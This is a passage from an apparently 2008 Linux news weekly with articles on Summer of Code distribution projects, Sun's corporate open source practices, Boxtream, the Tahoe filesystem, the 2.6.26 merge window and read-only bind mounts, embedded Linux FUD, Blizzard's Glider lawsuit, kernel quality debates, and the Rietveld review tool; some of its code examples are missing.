  slots: Debian, Fedora, Gentoo, and openSUSE. Conspicuous in their absence
  are other major distributions such as Mandriva and Ubuntu. One wonders what
  happened—did they apply (if not, how come?); were they rejected?
  Ubuntu participated in 2006 and 2007, so it is curious that the
  distribution is not in SoC this year. In addition to these four
  distributions, three of the BSDs participated as well, receiving a combined
  total of 35 slots: DragonFly BSD, FreeBSD, and NetBSD. Since these are
  operating systems in addition to their own package distributions, many of
  their slots are devoted to core OS code, while the Linux distributions'
  slots are not.


  Let's take a closer look at the types of distribution projects in this year's
  Summer of Code. Many of Debian's 12 projects relate to installation (two
  slots), configuration management (two slots), or package
  management/development (seven slots). The exception is a project to make an
  embedded, Debian-based NAS device.


  Another 12 slots went to Fedora, which shared two of its slots with
  JBoss. Fedora has a more eclectic mix: it devoted two slots to package
  management and two to configuration management, investing the remaining slots
  in features for a translation framework (three), creation of a new Web interface
  for the hardware profiler Smolt, enhancement of the
  booting profiler Bootchart to use SystemTap, and creation of a
  simple, non-linear video editor for ogg video to integrate with the
  screencasting tool recordmydesktop.


  Gentoo received six slots, of which two relate to package management. The other
  four are dedicated to diverse projects: implementing OpenPAM-compatible modules
  for Linux, improving a Web-based, WYSIWYG XML editor, making it easy to set
  up a Beowulf cluster, and improving Gentoo's embedded network-appliance
  framework.


  OpenSUSE got ten slots; five of these are going toward package
  management/development, and one is going toward installation. The remaining four
  are the most generally interesting: implementing a face-based authentication
  module, enabling ext4 as GRUB's boot partition, interactive crash analysis
  (presumably an improvement upon what recent GNOME versions do rather than a
  duplication), and creation of a GUI manager for LTSP thin clients.


  Now let's take a quick look at BSD land. Of DragonFly's projects, six out
  of seven are
  OS-related, and the other is installation-related. FreeBSD received 21
  slots, of which many are devoted to the core OS—of the rest, four are
  related to package management/development, and one aims to improve Wine
  support. NetBSD received 14 slots, of which many again went to the core OS.
  Other than that, one slot went to installation and another to package
  management.


  Distributions and "mixed" distributions/OSs unsurprisingly devote a large
  quantity of their efforts to their core competencies of package management,
  configuration management, and installation. At least in the Summer of Code,
  however, they do devote a significant amount of effort to solving larger
  problems that affect people outside the distribution.


		Sun and corporate open source


Over the last couple of weeks there has been an interesting set of articles
posted on various weblogs on how Sun is managing its open source projects.
As more companies try to get involved with free software, they may find
things to learn from this discussion.  So here are a few thoughts on
corporate open source.


It all started with a
posting by Ted Ts'o which stated:


	So if you run into a Sun salescritter or a Sun CEO claiming that
	OpenSolaris is just like Linux, it's not. Fundamentally, Open
	Solaris has been released under a Open Source license, but it is
	not an Open Source development community. Maybe it will be someday,
	as some Sun executives have claimed, but it's definitely not a
	priority by Sun; if it was, it would have been done before now.


The posting drew responses from Dave
Neary and Alvaro
Lopez Ortega, among others; both the original messages and the
responses to it are
worth reading in their entirety.  In summary, the responses say that (1) Sun
really is trying to be a good open source player, and (2) Sun has done
as well as could be expected, that the creation of
true open source communities is hard.


The first part can only be true.  Sun has been the source of a great deal
of free software, including packages like OpenOffice.org which are found in
almost every Linux distribution.  This company has released its core
operating system as open source, and it is making noises about, finally,
making Java truly open at all levels.  There are few companies which have
contributed code at this level, and that should be recognized.  Beyond any
doubt, Sun is contributing to this community.


What people question, though, is Sun's interest in creating real
communities around its open source projects.  These projects are
notoriously hard to participate in and contribute to.  As Ted points out,
OpenSolaris currently gets less than one patch per day from outside the
company, the project's governing board is made up entirely of Sun
employees, and its (non-distributed) revision control system lives inside
the Sun firewall.  External OpenSolaris developers have known to quit with
messages
like:


	Sun agreed that "OpenSolaris" would be governed by the community
	and yet has refused, in every step along the way, to cede any real
	control over the software produced or the way it is produced, and
	continues to make private decisions every day that are later
	promoted as decisions for this thing we call OpenSolaris.  Rather
	than be honest about it and restructure the community to correspond
	to this MySolaris style of over-the-wall development, Sun prefers
	to lie to the external community members while ignoring their
	input.


OpenOffice.org, too, remains hard to work with; thus the
many discouraged comments on the ooo-build
wiki from developers who want to get things done:


	Many ooo-build patches are ready for up-streaming but there is no /
	little response from up-stream. Worse there is the perception that
	taking leadership and actually doing something about merging fixes
	would be firmly opposed. Finally - even when maintainers are
	active, responsive &amp; friendly - there is no agreed mechanism for
	blanket approving fixes - or sub-types of trivial fixes, which thus
	tend to fester in IssueZilla. 


The key to what is going on here can be found in many places, including in
Alvaro's posting:


	Besides, the OpenSolaris development model is quite different
	because of a number of technical reasons. IMO, the first one is
	something as simple as that we want to ensure its quality by
	following a number of processes. Another very important technical
	point is that we want OpenSolaris to continue being binary
	compatible (ABI) with the previous Solaris revisions, which is
	something Linux could not even dream of.


The real issue is control; Sun does not want to relinquish control over how
its projects evolve.  This is not a particularly uncommon situation with
corporate-controlled projects; these projects will always be subject to the
controlling company's agenda.  Thus, no developer is likely to be
successful in projects like:


 Adding features to MySQL which provide the functionality which is
     otherwise being reserved for the "enterprise" offerings.

 Adding packages to Fedora which make Red Hat's legal department
     nervous. 

 Adding features to projects owned by the Free Software Foundation
     which, in the FSF's opinion, are not consistent with its goals;
     support for loading Emacs modules from an external repository is one
     example.

 Making any changes to Firefox which could threaten Mozilla
     Corporation's revenue stream from Google.


Companies which control open source projects in this way are generally
acting within their rights; they may even be acting in their own best
interests.  The software is still open source.  But the retention of this
sort of control will have an effect on the community which builds around
the software.  In many cases, it can have the effect of preventing the
creation of that community in the first place.

And that, too, may be what the company had in mind.  There are a number of
company-controlled open source projects which, by all appearances, are
mostly for show and bragging rights.  The company does not really seem to
have much interest in developing a significant external community.  In
cases like this, if the software on offer is valuable enough, the result
will often be a more community-oriented fork.  Projects like ADempiere, LedgerSMB, and Cinelerra CV result from this kind of
frustration.


Opinions clearly differ on whether Sun is truly uninterested in the
creation of outside development communities for its projects, or whether it
simply is having a hard time letting go.  If the latter is the case, then
Sun might be well advised to follow Dave
Neary's suggestion and create a separate, non-profit foundation for the
development of OpenOffice.org.  Sun's apologists are right when they say
that turning a large blob of proprietary code into free software is a hard
thing to do.  But it's harder if you don't give the community the power to
help; in the case of OpenOffice.org, there would appear to be enough of an
interested community to make a real go at it.  This might be Sun's best
chance to show that it can create real development communities
around its software.

		Stream video and audio with Boxtream


Boxtream
is a GPL-licensed streaming video and audio system that is being
developed by Jerome Alet and a

team of developers at the University of Nice in France:


Boxtream is a mobile and autonomous audio and video streaming and recording studio. Of course, depending on your own hardware choices, the number and extent of capabilities and the quality of the final results may vary, but at least the software part should be versatile enough to accommodate even the most basic hardware.
Boxtream was mostly designed to stream live courses featuring a professor and his slides (or any other computer based output like software training, web browser, video player...), but can also be used to stream congresses, interviews and the like.


Boxtream uses a virtual smorgasbord of open-source components to achieve
its results.  Scripting is done with the Python language, metadata is
stored in the XML format.
The GStreamer
multimedia framework library is used for handling the audio/video
data and the
Icecast streaming media
server is used for media distribution.
Video and audio are encoded with 
Ogg Theora and
Ogg Vorbis.  The
Graphviz graph visualization
software is used for presenting  a graphical view of the video
system's scenario.


A few notable Boxtream features include a GUI interface, support for
on-disk recording, selectable audio and video rates, support for
image overlays and automation for all tasks.
The Boxtream
features
list has a more complete list.
Boxtream supports a number of video switching devices as well as other
video and audio equipment.  The
hardware
list has more information.


This 
architecture diagram gives a pictorial view of a fairly complicated
Boxtream system.  An online
example
shows the system being used for a scientific conference.


Boxtream version 0.998 was
announced
on April 27, 2008.
Changes include support for more video hardware, inclusion of the dia
schema software, bug fixes and a license change from GPLv2 to GPLv3.
If your organization is in need of a full-featured video conferencing
system, you should give Boxtream a look.


		The Tahoe secure filesystem


The Tahoe filesystem is
designed as a secure, distributed filesystem that is available as free
software.  Tahoe is also designed for fault tolerance so that data remains
available even in the presence of missing or
malicious peers.  In March, the project released a 1.0 version which
makes this a good time to take a peek. 


The basics of Tahoe are somewhat similar to GNUnet or Freenet in that the data is encrypted
and spread
around to multiple nodes in the network.  Unlike those, though, Tahoe does
not seek to provide anonymity.  The nodes making up a Tahoe
filesystem are called a "grid". Grids consist of some number of
peers acting as storage server nodes along with an "introducer" that knows
all of the other
nodes and is the central point of contact for the grid.


Files are stored in Tahoe by first being encrypted on the local machine
using AES.  They are then broken into "shares", ten by default,
that are distributed to different servers in the grid.  Before that
happens, though, the encrypted file is encoded in such a way that the whole
file can be recovered even if only a subset of the shares can be retrieved.


This encoding, known as "erasure coding", is the
key to the fault-tolerance of the Tahoe system.  By default, Tahoe encodes
the shares such that retrieving three of the ten is sufficient to recover
the entire file.  It also increases the size of the file by the expected
10/3 ratio.


The suggested use case for Tahoe is a "friendnet" where some group of
friends share their storage with each other in a way that reduces or
eliminates the need for backups.  Tahoe also has ways to share data in
either read-only or read-write (immutable or mutable in Tahoe-speak)
modes.  Tahoe is used as a commercial backup system by Allmydata, sponsor of the
Tahoe project.


Tahoe is designed to be secure, which means that it protects the integrity
and confidentiality of the data stored in it.  SHA-256 is used extensively
to ensure consistency of the plaintext, ciphertext, and shares.  Files
stored in the system are identified by long identifiers called capabilities, that look
something like:

For mutable files, there are two versions of the capability, one that
allows only reading, while the other allows writing as well.  Anyone who
does not have a
capability string for a particular file cannot access it at all.


 Multiple user interfaces are available for Tahoe, including a web
interface, a command-line interface, a FUSE extension and a web API.
Tahoe is written in Python, using some C extensions for efficiency.  It
uses the Twisted framework for
event handling, pycryptopp (a Python
interface to the Crypto++ library) for its encryption needs, and zfec for the erasure coding.
All of the Tahoe code is available under the GPL.

 Installing Tahoe was fairly straightforward—there were a few
hiccups which have since been resolved—using the installation
guide.  Joining the test grid was as
easy as putting an introducer identifier into a file and starting Tahoe
from the command line.  In some basic testing, it seems to work quite well,
overall, though it did not seem to use available bandwidth as efficiently
as it might.  


This brief overview only scratches the surface of the information available about Tahoe; there is much more on the documentation page.  For anyone interested in distributed, secure, and/or fault-tolerant
filesystems, Tahoe is definitely worth a look.  

		The last things through the 2.6.26 merge window


About 500 changesets were merged after the publication of the first and second 2.6.26 merge window
summaries.  The merge window is now closed; here is the final set of
changes which got in:


 New drivers for Solarflare Communications Solarstorm SFC4000
     controller-based Ethernet controllers,
     Hauppauge HVR-1600 TV tuner cards,
     ISP 1760 USB host controllers,
     Cypress c67x00 OTG controllers, and
     Intel PXA 27x USB controllers.


 8Kb stacks are, once again, the default for the x86 architecture.
     "Out-of-memory situations are less problematic than silent and
     hard to debug stack corruption."

 The klist type now has the usual-form macros for declaration and 
     initialization: DEFINE_KLIST() and KLIST_INIT().
     Two new functions (klist_add_after() and
     klist_add_before()) can be used to add entries to a klist in
     a specific position.

 As had been planned, struct class_device has been removed
     from the driver core, along with all of the associated infrastructure.
     Classes are now implemented with an ordinary struct device.

 kmap_atomic_to_page() is no longer exported to modules.

 There are some new generic functions for performing 64-bit integer
     division in the kernel:


     Unlike do_div(), these functions are explicit about whether
     signed or unsigned math is being done.  The x86-specific
     div_long_long_rem() has been removed in favor of these new
     functions.

 There is a new string function:


     It compares the two strings while ignoring an optional trailing
     newline. 

 The prototype for i2c probe() methods has changed:


     The new id argument supports i2c device name aliasing.

 There is a new configuration (MODULE_FORCE_LOAD) which
     controls whether the loading of modules can be forced if the kernel
     thinks something is not right; it defaults to "no."


		How not to sell embedded Linux


Every now and then one should have a look at some unabashed fear,
uncertainty, and doubt (FUD) material.  It's good to know what the other
side is saying, the level of unintended humor is often high, and, on occasion, one even
learns something.  Your editor's suggestion for FUD of the week is this Embedded.com
article by Dan O'Dowd.  Therein, one will learn about the impending
death of embedded Linux as told by the companies which sell embedded Linux.


In particular, Mr. O'Dowd looks at some marketing material from MontaVista
and Wind River, and concludes:


	This embedded Linux bashing from embedded Linux's strongest
	proponents should give pause to those who are thinking through
	their embedded operating system strategy. If embedded Linux
	champions are saying that embedded Linux is terrible, why would
	anyone want to risk their products or their company on it? 


One can easily pick holes in this article, starting with the assertion that
MontaVista and Wind River are "Linux's strongest proponents."  One could
also recall that we have heard this kind of thing before; in 2004,
Mr. O'Dowd (who happens to be the founder and CEO of a proprietary embedded
systems software vendor)
helpfully warned us
that "intelligence agencies and terrorists" would contribute "subversive
software" to Linux and lectured on the need for secret
source code to achieve true security.  One could point out that many of the
points put forward by Mr. O'Dowd appear to be pure fantasy.
All of these rebuttals would be valid, but they
risk missing an important point to be gained from this article - though
it's not quite the point Mr. O'Dowd is trying to make.


Mr. O'Dowd obtains his "facts" from two sources: an advertisement by Wind
River Systems (which your editor was unable to find online) and, primarily,
from a column by MontaVista founder Jim Ready in Military
Embedded Systems magazine.  Mr. Ready's evident purpose is to frighten
embedded systems vendors into buying his company's services; to that end,
he lays it on pretty thick:


	To keep abreast of the changes occurring on a daily basis, a
	developer needs to monitor the email traffic of 11 different and
	unsynchronized open source projects: kernel.org, the core home of
	the Linux kernel; the gcc and glibc projects (the core tool chain
	and libraries from FSF at fsf.org); and at least nine other
	components that would typically comprise a useable Linux
	development environment. 

	Kernel.org itself may have up to 5,000 messages a day with 1,000 of
	these being patches that need to be evaluated and possibly applied
	to the source base. Simply ignoring the traffic, figuring that the
	system in use seems to be working well enough, can lead to
	disastrous consequences later. For example, a recent security patch
	that took all of 13 lines of code to implement against an embedded
	Linux system would have taken more than 800k lines of source
	patches to implement if the previous trail of patches had been
	ignored. It's a classic case of pay now or really pay later.


Somebody must have had a great deal of fun putting all of those numbers
together.  The generation of ordinary random numbers can be managed through
traditional methods like a toss of the dice, picking numbers out of a hat,
or reading corporate earnings estimates.  Randomness on this scale, though,
can only be achieved through the use of special-purpose software.


Even by kernel.org standards, 5,000 messages per day is fairly intense,
though your editor, a subscriber to the linux-kernel, git-commits-head, and
mm-commits lists, can attest that the order of magnitude is right at least.
But your editor cannot even begin to grasp the thought process which turns
a 13-line security patch into 800,000 lines of code.  Imagine posting
that to linux-kernel.  "Pay now or really pay later" indeed.


But the provenance of the numbers is not really the point here.  Mr. Ready
is perpetrating the fallacy that, to build an embedded system with Linux,
one starts with the various components and integrates them all by hand.
If a company were to take that path, it might well incur the high costs
that Mr. Ready warns about.  Creating your own distribution - and
maintaining it over a product's life - is, indeed, a difficult and
expensive job.

But it is a rare vendor which does that; even Gentoo users outsource
much of the integration work to their distributor.  Why would any vendor
create its own distribution when there are so many out there to base a
product on?  Customizing a distribution for an embedded application is not
a trivial job, but it's not rocket science either.  The distributor will
keep up with most of those mailing lists, and, somehow, a reasonable
distribution also manages to ship security updates which do not involve
800,000 lines of code.  There is no reason for embedded systems vendors to
wander into the expensive mess that Mr. Ready describes; the creation of a
suitable distribution is much easier than that.


Even so, many vendors may decide that, in fact, they would rather not be in
the business of customizing distributions.  They might, instead, look to a
vendor to do that work for them.  It makes perfect sense for companies like
MontaVista and Wind River (among others) to offer to provide a stable,
integrated, and supported platform to embedded systems vendors for a
fee.  There is honest value in this line of business.


But one does have to wonder why these companies feel the need to scare
companies into buying their services.  Those services, properly rendered,
have a real value which can be sold without resort to outright FUD.
Failure to focus on that value gives encouragement to people like
Mr. O'Dowd, who would be most pleased if embedded Linux were to go away
altogether.  This does not seem like a sensible business strategy.
Companies which seek to make money from Linux might just want to think
twice before poisoning the well they are trying to drink from.  That
is the real lesson to be learned from this particular piece of writing.

		Blizzard tests the reach of copyright law


Free software users rarely, if ever, need to be concerned about the license
that governs the applications they use.  Unlike developers or distributors,
users are unlikely to pay attention to whether a program is released
under a BSD, GPL, or some other license—not so with proprietary
software.  If Blizzard Entertainment has its way, it could get a whole
lot worse, with proprietary vendors controlling the behavior of its users
and enforcing it by way of the Copyright Act.


Blizzard, makers of the online role-playing game World of Warcraft (WoW), has
filed a lawsuit
against MDY, Inc., makers of a tool that assists players in gaining levels
within the game.  The Glider program
essentially plays the game for a user, creating a more powerful character,
with additional riches, while the user is otherwise occupied.  Some would
claim it is a legitimate way to avoid some of the drudgery of "leveling up"
a new character, while others would see it as a means of cheating.  In any
case it is clearly a violation of the Terms of
Use (TOU) of WoW.

 But those terms are only accepted by a user when they agree to the End
User License Agreement (EULA) that comes with the game.  Blizzard would
seem to have plenty of ammunition to take action against players that use
Glider, but instead of suing its customers for breach of
contract—perhaps they have learned something by watching the music
industry—they went after the easier target.  Had they only sued MDY
for "tortious interference with contracts", it probably would have
attracted little attention.  But Blizzard did something that aroused the
interest of the
Electronic Frontier Foundation (EFF), Public Knowledge, and
others by trying to stretch copyright law to cover MDY's actions.  

Certainly Blizzard is no stranger to using copyright law—in particular the
much-despised Digital Millennium Copyright Act (DMCA)—in ways that many
have found objectionable.  The courts, at least in the Blizzard v. BNETD
case, have agreed with Blizzard, though, shutting down the development
of an alternative
server for players of their games.  Because of that, any time Blizzard makes a copyright
claim, serious scrutiny from various watchdogs can be expected.


Blizzard's claim is that, by running Glider, its users are not only in violation of
the contract they agreed to, but they are also committing copyright
infringement.  As has been seen in various file-sharing lawsuits, whenever
copyright is supposedly violated on a computer, any program
even tangentially involved in that violation is then accused of
"contributory infringement"; this is the second claim that Blizzard makes
against MDY in its suit.  Under Blizzard's interpretation, users are
allowed to copy the program into the RAM of their computer as long as they
do not violate the TOU.  If they do violate them, their license to copy to
RAM—a necessary step to be able to use the program at all—is
terminated; they are infringing Blizzard's copyright and liable for damages
starting at $750 per illegal RAM copy.  


If Blizzard's interpretation is upheld by the courts, many other acts would
also serve as copyright infringements: choosing a character name that
violates any of the thirteen name restrictions spelled out in the TOU,
transmitting or posting "any content or language which, in the sole and
absolute discretion of Blizzard, is deemed to be offensive...", or
"anything that Blizzard considers contrary to the 'essence' of the
Program", for example.  Under those conditions, Blizzard could
essentially claim copyright infringement any time they wish; racking up another 
$750+ each time the program is used.


Public Knowledge outlined two good reasons that the copyright infringement
claim should be discarded.  It is well established that it is not an
infringement if making a copy is
required to use the copyrighted material, as it is for software.
Blizzard's argument that due to the terms of the EULA, those who buy WoW are not "owners" but instead
license the software is also weak.  The courts
have always looked on software purchases as sales, not rentals under some
company-controlled license, in much the same way that music and movies are
purchased.  Copyright owners would love to be able to eliminate the "first
sale doctrine" that allows owners to sell used books and other copyrighted
content, but the courts have so far been unwilling to go along.


One would hope that the courts would be persuaded not to see this dispute
in terms of copyright either, but there is the risk that a tool used for
"cheating" might not get the benefit of a well-reasoned view. There
have been many occasions where the US courts have made surprising
decisions regarding copyright.  Undoubtedly there are various copycat suits
waiting in the wings should such a decision be reached.  In the end,
though, neither Blizzard nor any copycats really want to go after the
actual "infringers"—also known as customers—they want to go after
others who allow users to use (or abuse) their software in ways they do not
like.  It is a classic proprietary software control strategy, and, thankfully,
something that free software users do not have to endure.


There is an interesting comparison to be made with free software licensing,
though.  Licenses like the GNU GPL also restrict behavior based on
copyright law; GPLv3, for example, makes some specific requirements on the
patent-licensing agreements that one can make with third parties.  Like
Blizzard, those who release software under a free license can make a claim
of copyright infringement (not breach of contract) if the terms of that
license are not adhered to.  There is a crucial difference, though: free
software licenses do not regulate the use of the software, only its
distribution.  By claiming that users of the software violate copyright if
it does not like their behavior, Blizzard is attempting to extend the reach
of copyright law far beyond anything seen in the free software community. 


It is certainly understandable that Blizzard would prefer that its users
did not employ Glider or other, similar software.  They believe it
unbalances the game; making it unfair to other players.  In the past, they
have temporarily or permanently banned players for using bot software, but
Glider is evidently more difficult to detect, which led to the current
lawsuit.  


Blizzard must police its own game, however, and should not expect others
to do it for them.  It is hard to see that Glider is doing anything particularly wrong
here, though Blizzard may prevail on either or both of its claims.  If
players want to find ways around things they don't like about the game,
they will, unless Blizzard finds technological means to prevent it.
It would appear that there is a substantial business
opportunity in helping players avoid some of the boring, repetitive parts
of playing the game—one that Blizzard currently ignores. 

 Though there is no direct threat to free software from this litigation
(unless one is developing free game-playing robots),
any potential expansion of copyright is worth watching.  The community
relies upon copyright law to enforce its licenses, so watching how judges
make decisions about such issues is important.  While it may be that
Blizzard is in the right to go after "cheaters" and a company that helps
them, it should not be doing that by trying to expand the reach of its
copyrights to this extreme.  

		Time to slow down?


All communities develop rituals over time.  One of the enduring
linux-kernel rituals is the regular heated discussion on development
processes and kernel quality.  To an outside observer, these events
can give the impression that the whole enterprise is about to come crashing
down.  But the reality is a lot like the New Year celebrations your editor
was privileged enough to see in Beijing: vast amounts of smoke and noise,
but everybody gets back to work as usual the next day.

Beyond that, though, discussions of this nature have real value.  Any group
which is concerned about issues like quality must, on occasion, take a step
back and evaluate the situation.  Even if there are no immediate outcomes,
the ideas raised often reverberate over the following months, sometimes
leading to real improvements.


The immediate inspiration for this round of discussion was broken systems
resulting from the 2.6.26 merge window.  This development cycle has had a
rougher start than some, with more than the usual number of patches causing
boot failures and other sorts of inconvenient behavior.  That led to some
back-and-forth between developers on how patches should be handled.  Broken
patches are unfortunate, but one thing is worth noting here: these problems
were caught and fixed even before the 2.6.26-rc1 kernel release was made.
The problems which set off this round of discussion are not bugs which will
affect Linux users.


But, beyond any doubt, there will be other bugs which are slower to surface
and slower to be fixed.  The number of these bugs has led to a number of
calls to slow down the development process in one way or another.  To that
end, it is worth noting that the process has slowed down somewhat,
with the 2.6.26 merge window bringing in far fewer changesets than were
seen for 2.6.24 or 2.6.25.  Whether this slower pace will continue into
future development cycles, or whether it's simply a lull after two
exceptionally busy cycles remains to be seen.


But, if the process does not slow down on its own, there are developers who
would like to find a way to force it to happen.  Some have argued for
simply throttling the process by, for example, limiting new features in
each development cycle to specific subsystems of the kernel.  There has
also been talk of picking the subsystems with the worst regression counts
and excluding new features from those subsystems until things improve.  The
fact of the matter, though, is that throttling is unlikely to help the
situation.  


Slowing down merging does not keep developers from developing, it just
keeps their code out of the tree.  An extreme example can be found in the
2.4 kernel: the merging of new code was heavily throttled for a long time.
What happened was that the distributors started merging new developments
themselves because their users were demanding them.  So a lot of kernels
which went under the name "2.4" were far removed from anything which could
be downloaded from kernel.org.  That way lies fragmentation - and almost
certainly lower quality as well.


Linus actually takes this argument further
by arguing that quickly merging patches leads to better quality:


	 [M]y personal belief is that the best way to raise quality of code
	 is to distribute it. Yes, as patches for discussion, but even more
	 so as a part of a cohesive whole - as _merged_ patches!

	 The thing is, the quality of individual patches isn't what
	 matters! What matters is the quality of the end result. And people
	 are going to be a lot more involved in looking at, testing, and
	 working with code that is merged, rather than code that isn't.


Andrew Morton has also argued against
throttling:


	If we simply throttled things, people would spend more time
	watching the shopping channel while merging smaller amounts of the
	same old crap.


Kernel developers are, of course, known to be hard-core shoppers, so giving
them more opportunity to pursue that activity is probably not the best
idea.  Seriously, though: Andrew is in favor of a slower development
process, but only when approached from a different angle: his point is that
an increased focus on quality will, as a side effect, result in slower
development.  Kernel developers need to be focused on finding and fixing
bugs rather than creating new ones and/or shopping.


It is worth noting that a substantial portion of the development community
appears to believe that there are no real problems in this regard.  Bugs
are being found and fixed at a high rate and the kernel is solid for most
users.  Arjan van de Ven notes:


	Are we doing worse on quality? My (subjective) opinion is that we
	are doing better than last year.  We are focused more on
	quality. We are fixing the bugs that people hit most. We are fixing
	most of the regressions (yes, not all). Subsystems are seeing flat
	or lower bugcounts/bugrates.


Ted Ts'o points out that a lot of problems
result from obscure and low-quality hardware, and that it's not possible to
make everybody happy.  Andrew is unconvinced, though, and seems to fear that
the kernel is declining in quality.


In a sense, though, that part of the discussion is moot.  Nobody would
argue against the idea that fewer bugs is a worthy goal, regardless of whether one believes
that the current process has quality problems.  So talk of ways to make
things better is always on-topic.


Testing remains a big issue; the kernel, more than almost any other
project, is highly sensitive to the systems on which it is run.  Many
problems (arguably the majority of them) are related to specific hardware,
or specific combinations of hardware; there is no way for the developers,
who do not have all possible hardware to test on, to ever find all of these
bugs.  Users have to help with that process.  Getting widespread testing
coverage is always hard; Peter Anvin argues
that the current process has actually made that harder:


	One thing is that we keep fragmenting the tester base by adding new
	confidence levels: we now have -mm, -next, mainline -git, mainline
	-rc, mainline release, stable, distro testing, and distro release
	(and some distros even have aggressive versus conservative tracks.)
	Furthermore, thanks to craniorectal immersion on the part of
	graphics vendors, a lot of users have to run proprietary drivers on
	their "main work" systems, which means they can't even test newer
	releases even if they would dare.


There is, in fact, a wealth of development kernels to test, and it is not
always clear where users and developers should be concentrating their
testing effort.  A consensus may be forming, though, that more people
should be looking at the linux-next tree in particular.  Linux-next is
where all of the patches intended for the next merge window are supposed to
congregate; the current contents of linux-next, as of this writing, are
targeted toward 2.6.27.  This is the place where early integration issues
and other problems should be found; if linux-next is well tested, the
number of problems showing up in the next merge window should be somewhat
reduced. 


The linux-next tree is an interesting experiment.  It is, for all practical
purposes, making the development cycle longer: since linux-next exists, the
2.6.27 cycle has, in some sense, already started.  Linux-next also does
something which kernel developers have tended to resist: causing the
stabilization period for one development cycle to overlap with active
development for the next cycle.  In the past, it has been argued that this
kind of overlap will cause developers to prioritize the creation of new
toys over fixing the problems with last week's toys. 


Some people argue that this is happening now: developers are not
spending enough time dealing with bugs - and that their carelessness is
creating too many bugs in the first place.  Others assert that, while it will
never be possible to fix every reported bug, the bugs that really matter
are being addressed.  A real resolution to this disagreement seems
unlikely; the creation of meaningful metrics on kernel quality is a
difficult task.  About the best that can be done is to try to keep the
regression list as small as possible; as long as systems which once worked
continue to work, it is hard to argue too forcefully that things are headed
in the wrong direction.


		Read-only bind mounts


Bind mounts can be thought of as a sort of symbolic link at the filesystem
level.  Using mount --bind, it is possible to create a second
mount point for an existing filesystem, making that filesystem visible at a
different spot in the namespace.  Bind mounts are thus useful for creating
specific views of the filesystem namespace; one can, for example, create a
bind mount which makes a piece of a filesystem visible within an
environment which is otherwise closed off with chroot().

There is one constraint to be found with bind mounts as implemented in
kernels through 2.6.25, though: they have the same mount options as the
primary mount.  So a command like:


will fail to make /vital_data read-only under
/untrusted_container if it was mounted writable initially.  On
your editor's 2.6.25 system, the failure is silent - the bind mount will be
made writable despite the read-only request and no error message will be
generated (the mount man page does document that options cannot be
changed). 

<!-- LWNPutAdHere -->

There is clear value in the ability to make bind mounts read-only, though.
Containers are one example: an administrator may wish to create a container
in which processes may be running as root.  It may be useful for that
container to have access to filesystems on the host, but the container
should not necessarily have write access to those filesystems.  As of
2.6.26, this sort of configuration will be possible, thanks to the merging
of the read-only bind mounts patches by Dave Hansen.


As it happens, it's still not possible to create a read-only bind
mount with the command shown above; the read-only attribute can only be
added with a remount operation afterward.  So the necessary sequence is
something like:


This example raises an interesting question: what if some process opens a
file for write access between the two mount operations?  A system
administrator has the right to expect that a read-only mount will, in fact,
only be used for read operations.  The 2.6.26 patch is designed to live up
to that expectation, though the amount of work required turned out to be
more than the developers might have expected.

Filesystems normally track which files are opened for write access, so an
attempt to remount a filesystem read-only can be passed to the low-level
filesystem code for approval.  But the low-level filesystem knows nothing
about bind mounts, which are implemented entirely within the virtual
filesystem (VFS) layer.  So making read-only access for bind mounts work
requires that the VFS keep track of all files which have been opened for
write access.  Or, more precisely, the VFS really only needs to keep track
of how many files are open for write access.

The technique chosen was to create something which looks like a write lock
for filesystems.  Whenever the VFS is about to do something which involves
writing, it must first call:


The return value is zero if write access is possible, or a negative error
code otherwise.  This call can be found in obvious places - such as in the
implementation of open() - when write access is requested.  But
write access comes into play many other situations as well; for example,
renaming a file requires write access for the duration of the operation.
So mnt_want_write() calls have been sprinkled throughout the VFS
code. 

When write access is no longer needed, the "write lock" should be released
with a call to:


One of the discoveries which has been made is that write access is needed
in rather more places than one might have thought.  In particular, it turns
out that there is need for mnt_want_write() calls within the
low-level filesystems as well as in the VFS layer. So getting the
read-only bind mounts patch into shape has been an ongoing process of
finding the spots which have been missed and adding
mnt_want_write() calls there.  In an attempt to make this process
a bit less error-prone, Miklos Szeredi has put together a set of VFS helper functions
which encapsulate the situations where write access is needed.  Those
functions have not been merged for 2.6.26, however.

Superficially, mnt_want_write() is easy to understand - it simply
increments a counter of outstanding write accesses.  The problem with a
simple implementation, though, is that a shared, per-filesystem counter
would create scalability problems.  On multiprocessor systems, the cache
line containing the counter would bounce around the system, slowing things
considerably.

A common response to this type of problem is to turn the counter into a per-CPU
variable, allowing operations on the counter to remain local to each
processor.  When somebody needs to know the total value of the counters,
it's a simple matter of adding each CPU's version; this operation is slow,
but it is also rare.  On big systems, though, the number of CPUs can be
large - as can the number of filesystems, and bind mounts will only
increase that number.  The result is a multiplicative effect which, once
again, is a scalability problem, only this time it manifests itself in the
form of excessive memory use.

The read-only bind mounts patch resolves this situation by, in effect,
going back to global counters which are cached on specific processors.  To
that end, each CPU has one of these structures:


At any given time, this structure will hold a local count for one
filesystem, represented by mnt.  If the processor needs to adjust
the write count for that filesystem, it's a simple matter of incrementing
or decrementing count.  When the processor's attention turns to a
different filesystem, it must first adjust the global count for the old
filesystem, then it can switch its local mnt_writer structure to
the new one.  The result is a compromise between purely local and purely
global counters which yields "good enough" performance on benchmarks
designed to stress the system.


Read-only bind mounts join with other features (such as shared subtrees) to create a
flexible set of tools for the construction of the filesystem namespace.  It
is not clear how much of this functionality is being used at this time,
but, as the implementation of containers in the mainline gets closer to
completion, there is likely to be more interest in this capability.  Linux
systems in coming years may have much more complex filesystem layouts than
have been seen in the past.

		Rietveld: another code review aid


 With the release of
Rietveld, another tool for those interested in doing web-based code
reviews is now available.  We looked at Review Board back in
January.  It was inspired by an internal Google tool, written by Python
creator and Google employee Guido van Rossum, called Mondrian.
That tool in turn spawned Rietveld.  

The feature sets of Rietveld and Review Board are strikingly similar, which
is not surprising as
they both used Mondrian as a model.  van Rossum originally wanted to turn
Mondrian into a free software project, but it was too tied to "proprietary
Google infrastructure", so he started over, with Rietveld as the result.
Both tools are implemented in Python using the Django framework, but one
major difference is that Rietveld is written to use Google App Engine. 


There are multiple ways to get a set of patches into the Rietveld system to
create an "issue"—the term used for a patch set undergoing
review—from an upload of a unified diff to using a python script to
retrieve the patches from a repository.  Currently Rietveld only
supports Subversion, but van Rossum would like to see support added for
other version control systems over time.  Review Board has a bit of a head
start in this area, so it supports Mercurial, Git, Bazaar, Perforce, Subversion and CVS.


Once an issue has been created in the system, reviewers can then be invited
to comment on the changes.  Navigating through the diff is straightforward,
with Javascript being used liberally to give an interactive "local
application" feel to the interface.  Double-clicking on a line brings up a
